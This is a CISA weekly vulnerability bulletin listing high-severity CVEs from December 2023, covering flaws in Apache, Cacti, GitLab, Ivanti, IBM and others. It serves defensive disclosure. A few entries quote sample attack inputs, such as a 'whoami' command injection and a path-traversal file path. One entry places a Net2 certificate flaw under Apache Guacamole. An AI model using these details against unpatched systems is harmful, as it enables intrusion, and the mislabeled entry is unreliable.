US-CERT Vulnerability Summary for the Week of December 18, 2023

December 26, 2023

Bulletins provide weekly summaries of new vulnerabilities. Patch information is provided when available.

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. NVD is sponsored by CISA. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 

High Vulnerabilities

Primary
Vendor — Product		DescriptionPublishedCVSS ScoreSource & Patch Info
52north — 52north_wpsAn XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network.2023-12-197.2CVE-2023-6280
[email protected]
aditaas — allied_digital_integrated_tool-as-a-serviceThe vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers’ data and completely compromise the targeted platform.2023-12-189.8CVE-2023-6483
[email protected]
apache — dorisThe api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues.2023-12-188.2CVE-2023-41314
[email protected]
apache — dubboA deserialization vulnerability existed when decode a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue.2023-12-159.8CVE-2023-29234
[email protected]
[email protected]
apache — dubboDeserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue.2023-12-159.8CVE-2023-46279
[email protected]
[email protected]
apache — guacamoleApache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue.2023-12-198.8CVE-2023-43826
[email protected]
[email protected]
apache — guacamoleWhen installing the Net2 software a root certificate is installed into the trusted store. A potential hacker could access the installer batch file or reverse engineer the source code to gain access to the root certificate password. Using the root certificate and password they could then create their own certificates to emulate another site. Then by establishing a proxy service to emulate the site they could monitor traffic passed between the end user and the site allowing access to the data content.2023-12-198.1CVE-2023-43870
[email protected]
apache — pulsarImproper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions.2023-12-207.5CVE-2023-37544
[email protected]
[email protected]
apache — superset
 		An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue.2023-12-197.7CVE-2023-49734
[email protected]
[email protected]
armorxgt — spamtrapArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.2023-12-159.8CVE-2023-48384
[email protected]
aveva — edgeAn issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed.2023-12-169.8CVE-2021-42796
[email protected]
[email protected]
aveva — edgePath traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources.2023-12-167.5CVE-2021-42797
[email protected]
[email protected]
awslabs — sandbox-accounts-for-events“Sandbox Accounts for Events” provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts, it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0.2023-12-227.1CVE-2023-50928
[email protected]
[email protected]
awslabs — sandbox-accounts-for-eventsSandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0.2023-12-227.8CVE-2023-51386
[email protected]
[email protected]
backupbliss — backup_migrationThe Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.2023-12-159.8CVE-2023-6553
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
bazarr — bazarrBazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.2023-12-157.5CVE-2023-50264
[email protected]
[email protected]
[email protected]
bazarr — bazarrBazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.2023-12-157.5CVE-2023-50265
[email protected]
[email protected]
[email protected]
bosch — cpp13_firmwareA command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera.2023-12-187.2CVE-2023-39509
[email protected]
bosch — monitor_wallAn improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation.2023-12-187.5CVE-2023-32230
[email protected]
cacti — cactiCacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `link.php`. Impact of the vulnerability execution of arbitrary code on the server.2023-12-218CVE-2023-49084
[email protected]
cacti — cactiCacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability – arbitrary SQL code execution. As of time of publication, a patch does not appear to exist.2023-12-228.8CVE-2023-49085
[email protected]
[email protected]
cacti — cactiCacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `’managers.php’`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `’/cacti/managers.php’` with an SQLi payload in the `’selected_graphs_array’` HTTP GET parameter. As of time of publication, no patched versions exist.2023-12-228.8CVE-2023-51448
[email protected]
[email protected]
cambium_ — epmp_force_300-25Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges.2023-12-187.8CVE-2023-6691
[email protected]
clickhouse — clickhouseClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this exploit can also be triggered via HTTP protocol, however, the attacker will need a valid credential as the HTTP authentication take places first. This issue has been fixed in version 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts.2023-12-207CVE-2023-47118
[email protected]
clickhouse — clickhouseClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20.2023-12-227CVE-2023-48704
[email protected]
[email protected]
codelyfe — stupid_simple_cmsA vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259.2023-12-179.8CVE-2023-6901
[email protected]
[email protected]
[email protected]
codelyfe — stupid_simple_cmsA vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260.2023-12-179.8CVE-2023-6902
[email protected]
[email protected]
[email protected]
codelyfe — stupid_simple_cmsA vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability.2023-12-189.1CVE-2023-6907
[email protected]
[email protected]
[email protected]
csharp — cws_collaborative_development_platformSmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.2023-12-159.8CVE-2023-48376
[email protected]
csharp — cws_collaborative_development_platformSmartStar Software CWS is a web-based integration platform, it has a vulnerability of missing authorization and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service.2023-12-158.8CVE-2023-48375
[email protected]
cybrosys — website_blog_searchA SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component.2023-12-159.8CVE-2023-48049
[email protected]
dell — cpg_biosDell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device.2023-12-227.2CVE-2023-43088
[email protected]
dell — supportassist_client_consumerDell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges.2023-12-227.3CVE-2023-48670
[email protected]
dlink — dir-850l_firmwareAn issue in D-Link DIR-850L v.B1_FW223WWb01 allows a remote attacker to execute arbitrary code via a crafted script to the en parameter.2023-12-199.8CVE-2023-49004
[email protected]
dromara_hertzbeat — dromara_hertzbeatHertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1.2023-12-227.2CVE-2023-51387
[email protected]
[email protected]
[email protected]
dromara_hertzbeat — dromara_hertzbeatHertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue.2023-12-227.5CVE-2023-51650
[email protected]
[email protected]
dromara_hertzbeat — dromara_hertzbeat
 		Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue.2023-12-227.5CVE-2022-39337
[email protected]
[email protected]
[email protected]
[email protected]
efacec — bcu_500Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device.2023-12-209.6CVE-2023-50707
[email protected]
efacec — bcu_500A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application.2023-12-208.2CVE-2023-6689
[email protected]
engelsystem — engelsystemEnglesystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of Javascript code in another user’s context. This vulnerability enables an authenticated user to inject Javascript into other user’s sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1.2023-12-227.3CVE-2023-50924
[email protected]
[email protected]
eset,_spol._s_r.o. — eset_nod32_antivirusImproper validation of the server’s certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted.2023-12-217.5CVE-2023-5594
[email protected]
eurotel — etl3100EuroTel ETL3100 versions v01c01 and v01x37 does not limit the number of attempts to guess administrative credentials in remote password attacks to gain full control of the system.2023-12-199.8CVE-2023-6928
[email protected]
eurotel — etl3100EuroTel ETL3100 versions v01c01 and v01x37 suffer from an unauthenticated configuration and log download vulnerability. This enables the attacker to disclose sensitive information and assist in authentication bypass, privilege escalation, and full system access.2023-12-199.4CVE-2023-6930
[email protected]
eurotel — etl3100EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities.2023-12-197.5CVE-2023-6929
[email protected]
forestblog — forestblogA vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247.2023-12-179.8CVE-2023-6887
[email protected]
[email protected]
[email protected]
gallagher — controller_6000A format string issue in the Controller 6000’s optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.2023-12-187.5CVE-2023-24590
[email protected]
getsentry — sentry-javascriptSentry-Javascript is official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry’s Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0.2023-12-207.5CVE-2023-50249
[email protected]
[email protected]
[email protected]
github — enterprise_serverImproper privilege management in all versions of GitHub Enterprise Server allows users with authorized access to the management console with an editor role to escalate their privileges by making requests to the endpoint used for bootstrapping the instance. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.6, 3.10.3, and 3.11.0.2023-12-218CVE-2023-46647
[email protected]
[email protected]
[email protected]
[email protected]
github — enterprise_serverAn insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.2023-12-218.3CVE-2023-46648
[email protected]
[email protected]
[email protected]
[email protected]
github — enterprise_serverAn insertion of sensitive information into log file vulnerability was identified in the log files for a GitHub Enterprise Server back-end service that could permit an `adversary in the middle attack` when combined with other phishing techniques. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-218.1CVE-2023-6746
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
github — enterprise_serverAn insertion of sensitive information into the log file in the audit log in GitHub Enterprise Server was identified that could allow an attacker to gain access to the management console. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-217.2CVE-2023-6802
[email protected]
[email protected]
[email protected]
[email protected]
github — enterprise_serverAn improper authentication vulnerability was identified in GitHub Enterprise Server that allowed a bypass of Private Mode by using a specially crafted API request. To exploit this vulnerability, an attacker would need network access to the Enterprise Server appliance configured in Private Mode. This vulnerability affected all versions of GitHub Enterprise Server since 3.9 and was fixed in version 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.2023-12-217.5CVE-2023-6847
[email protected]
[email protected]
[email protected]
gitlab — gitlabA privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner2023-12-178.8CVE-2023-3907
[email protected]
[email protected]
gitlab — gitlabAn improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator.2023-12-158.1CVE-2023-6680
[email protected]
gitlab — gitlabAn issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards.2023-12-157.5CVE-2023-3904
[email protected]
[email protected]
gmarczynski — dynamic_progress_barA SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component.2023-12-159.8CVE-2023-40954
[email protected]
[email protected]
grackle — grackleGrackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn’t checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an applications GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioral characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an applications GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing.2023-12-227.5CVE-2023-50730
[email protected]
[email protected]
[email protected]
hcl_software — hcl_bigfix_platformUnauthenticated Stored Cross-Site Scripting (XSS) vulnerability. This XSS vulnerability is in the Download Status Report, which is served by the BigFix Server. 2023-12-217.7CVE-2023-37519
[email protected]
hcl_software — hcl_bigfix_platformUnauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay.2023-12-217.7CVE-2023-37520
[email protected]
hewlett_packard_enterprise — multiple_productsA potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass.2023-12-197.5CVE-2023-50272
[email protected]
hikvision — intercom_broadcast_systemA vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252.2023-12-177.5CVE-2023-6893
[email protected]
[email protected]
[email protected]
hitachi_energy — rtu500_scripting_interfaceA vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by using faking the identity of a RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface.2023-12-197.4CVE-2023-1514
[email protected]
hp — system_management_homepageA potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information.2023-12-177.5CVE-2023-50271
[email protected]
ibm — mq_applianceIBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536.2023-12-187.5CVE-2023-46177
[email protected]
[email protected]
ibm — planning_analyticsIBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567.2023-12-228CVE-2023-42017
[email protected]
[email protected]
ibm — security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing “dot dot” sequences (/../) to view modify files on the system. IBM X-Force ID: 271196.2023-12-209.1CVE-2023-47702
[email protected]
[email protected]
ibm — security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341.2023-12-208.8CVE-2023-47706
[email protected]
[email protected]
ibm — security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220.2023-12-207.5CVE-2023-47704
[email protected]
[email protected]
idemia — sigma_lite_firmwareThe Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device.2023-12-159.8CVE-2023-33218
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmwareThe handler of the retrofit validation command doesn’t properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device2023-12-159.8CVE-2023-33219
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmwareDuring the retrofit validation process, the firmware doesn’t properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device2023-12-159.8CVE-2023-33220
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmwareWhen reading DesFire keys, the function that reads the card isn’t properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key.2023-12-159.8CVE-2023-33221
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmwareBy abusing a design flaw in the firmware upgrade mechanism of the impacted terminal it’s possible to cause a permanent denial of service for the terminal. the only way to recover the terminal is by sending back the terminal to the manufacturer2023-12-157.5CVE-2023-33217
a87f365f-9d39-4848-9b3a-58c7cae69cab
imou — imou_life_appA session hijacking vulnerability has been detected in the Imou Life application affecting version 6.7.0. This vulnerability could allow an attacker to hijack user accounts due to the QR code functionality not properly filtering codes when scanning a new device and directly running WebView without prompting or displaying it to the user. This vulnerability could trigger phishing attacks.2023-12-198.1CVE-2023-6913
[email protected]
infinispan — infinispanA flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration.2023-12-187.2CVE-2023-5384
[email protected]
[email protected]
[email protected]
istanbul_soft_informatics_and_consultancy_limited_company — softomi_advanced_c2c_marketplace_softwareImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Advanced C2C Marketplace Software allows SQL Injection. This issue affects Softomi Advanced C2C Marketplace Software: before 12122023.2023-12-219.8CVE-2023-6145
[email protected]
itpison — omicard_edmITPison OMICARD EDM’s file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service.2023-12-159.8CVE-2023-48371
[email protected]
itpison — omicard_edmITPison OMICARD EDM ‘s SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.2023-12-159.8CVE-2023-48372
[email protected]
itpison — omicard_edmITPison OMICARD EDM has a path traversal vulnerability within its parameter “FileName” in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2023-12-157.5CVE-2023-48373
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-41727
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46216
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46217
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46220
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46221
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46222
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46223
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46224
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46225
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46257
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46258
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46259
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46260
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46261
[email protected]
ivanti — avalancheAn unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remote code execution.2023-12-199.8CVE-2023-46263
[email protected]
ivanti — avalancheAn unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remove code execution.2023-12-199.8CVE-2023-46264
[email protected]
